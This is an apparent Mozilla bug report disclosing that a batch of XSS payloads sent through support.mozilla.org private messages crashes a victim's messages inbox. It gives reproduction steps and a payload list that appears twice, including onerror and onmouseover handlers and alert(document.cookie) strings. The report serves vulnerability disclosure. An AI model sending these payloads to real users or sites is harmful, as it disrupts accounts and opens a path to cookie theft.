Paylod XSS (minor) to Crash Messages Inbox 1. Login website https://support.mozilla.org/ 2. Go to https://support.mozilla.org/id/messages/new 3. Send to account Victim with payload below ============================================= javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> \<a onmouseover="alert(document.cookie)"\>xxs link\</a\> \<a onmouseover=alert(document.cookie)\>xxs link\</a\> <IMG SRC=# onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <img src=x onerror="javascript:alert('XSS')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav
ascript:alert('XSS');"> ============================================= 4. After send Messages menu messages user victim crash and notification alert : An Error Occurred Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes. 5. This not Denial-of-service attack or Rate Limit, because this payload impact only user support.mozilla.org Impact : this menu new messages on suport mozilla can to send to all user account support, attacker can send payload crash messages to all user account support mozill. and all user cannot open messages menu on https://support.mozilla.org/id/messages/ ## Supporting Material/References: Because the proof of concept video file is too big, I uploaded it on youtube and the setting not public : https://youtu.be/IHAByCLG5Xg Thanks
Bug 1762414 Comment 0 Edit History
Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.
Paylod XSS (minor) to Crash Messages Inbox 1. Login website https://support.mozilla.org/ 2. Go to https://support.mozilla.org/id/messages/new 3. Send to account Victim with payload below ```HTML javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert("XSS")> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> \<a onmouseover="alert(document.cookie)"\>xxs link\</a\> \<a onmouseover=alert(document.cookie)\>xxs link\</a\> <IMG SRC=# onmouseover="alert('xxs')"> <IMG onmouseover="alert('xxs')"> <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> <img src=x onerror="javascript:alert('XSS')"> <IMG SRC=javascript:alert('XSS')> <IMG SRC="jav
ascript:alert('XSS');"> ``` 4. After send Messages menu messages user victim crash and notification alert : An Error Occurred Oh, no! It looks like an unexpected error occurred. We've already notified the site administrators. Please try again now, or in a few minutes. 5. This not Denial-of-service attack or Rate Limit, because this payload impact only user support.mozilla.org Impact : this menu new messages on suport mozilla can to send to all user account support, attacker can send payload crash messages to all user account support mozill. and all user cannot open messages menu on https://support.mozilla.org/id/messages/ ## Supporting Material/References: Because the proof of concept video file is too big, I uploaded it on youtube and the setting not public : https://youtu.be/IHAByCLG5Xg Thanks